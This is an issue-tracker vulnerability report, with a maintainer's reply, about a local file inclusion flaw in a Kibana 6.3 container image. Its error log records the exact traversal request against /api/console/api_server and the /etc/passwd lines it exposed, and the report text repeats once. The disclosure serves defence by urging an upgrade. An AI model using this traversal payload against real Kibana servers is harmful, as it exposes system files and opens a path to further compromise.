Closed kimattree closed 4 years ago
Category:
Container images
Type:
Bug
The current version of google/elastic-gke-logging/kibana:6.3 has a local file inclusion (LFI) vulnerability that allows directory traversal attacks on the underlying infrastructure. This can also lead to remote shell exploitation, as described here: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
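Using the current Kibana image, I was able to replicate the LFI traversal attack against /etc/passwd in the pod. The Kibana error log below records the request to /api/console/api_server, whose apis query parameter carries the traversal path, and the SyntaxError raised when Kibana's JavaScript parser (babylon) tried to parse the file's contents: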
{"type":"error","@timestamp":"2020-05-25T06:22:01Z","tags":[],"pid":1,"level":"error","error":{"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)","name":"SyntaxError","stack":"SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)\n> 1 | root:x:0:0:root:/root:/bin/bash\n | ^\n 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin\n 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin\n at Parser.pp$5.raise (/usr/share/kibana/node_modules/babylon/lib/index.js:4454:13)\n at Parser.pp.unexpected (/usr/share/kibana/node_modules/babylon/lib/index.js:1761:8)\n at Parser.pp.semicolon (/usr/share/kibana/node_modules/babylon/lib/index.js:1742:38)\n at Parser.pp$1.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2236:8)\n at Parser.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5934:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1911:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseBlockBody (/usr/share/kibana/node_modules/babylon/lib/index.js:2268:21)\n at Parser.pp$1.parseTopLevel (/usr/share/kibana/node_modules/babylon/lib/index.js:1778:8)\n at Parser.parse 
(/usr/share/kibana/node_modules/babylon/lib/index.js:1673:17)"},"url":{"protocol":null,"slashes":null,"auth":null,"host":null,"port":null,"hostname":null,"hash":null,"search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","query":{"sense_version":"@@SENSE_VERSION","apis":"../../../../../../../../etc/passwd"},"pathname":"/api/console/api_server","path":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","href":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"},"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)"} Debug: internal, implementation, error SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)
1 | root:x:0:0:root:/root:/bin/bash | ^ 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
The fix for this is in Elastic and Kibana versions 6.4.3, so the image needs to be updated to that version or later.
Hello!
Thank you for your interest in our solution and for this vulnerability report. Our solution will be updated soon.
Category:
Container images
Type:
Bug
The current version of google/elastic-gke-logging/kibana:6.3 has a local file inclusion (LFI) vulnerability that allows directory traversal attacks on the underlying infrastructure. This can also lead to remote shell exploitation, as described here: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
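Using the current Kibana image, I was able to replicate the LFI traversal attack against /etc/passwd in the pod. The Kibana error log below records the request to /api/console/api_server, whose apis query parameter carries the traversal path, and the SyntaxError raised when Kibana's JavaScript parser (babylon) tried to parse the file's contents: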
{"type":"error","@timestamp":"2020-05-25T06:22:01Z","tags":[],"pid":1,"level":"error","error":{"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)","name":"SyntaxError","stack":"SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)\n> 1 | root:x:0:0:root:/root:/bin/bash\n | ^\n 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin\n 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin\n at Parser.pp$5.raise (/usr/share/kibana/node_modules/babylon/lib/index.js:4454:13)\n at Parser.pp.unexpected (/usr/share/kibana/node_modules/babylon/lib/index.js:1761:8)\n at Parser.pp.semicolon (/usr/share/kibana/node_modules/babylon/lib/index.js:1742:38)\n at Parser.pp$1.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2236:8)\n at Parser.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5934:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1911:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseBlockBody (/usr/share/kibana/node_modules/babylon/lib/index.js:2268:21)\n at Parser.pp$1.parseTopLevel (/usr/share/kibana/node_modules/babylon/lib/index.js:1778:8)\n at Parser.parse 
(/usr/share/kibana/node_modules/babylon/lib/index.js:1673:17)"},"url":{"protocol":null,"slashes":null,"auth":null,"host":null,"port":null,"hostname":null,"hash":null,"search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","query":{"sense_version":"@@SENSE_VERSION","apis":"../../../../../../../../etc/passwd"},"pathname":"/api/console/api_server","path":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","href":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"},"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)"} Debug: internal, implementation, error SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)
The fix for this is in Elastic and Kibana versions 6.4.3, so the image needs to be updated to that version or later.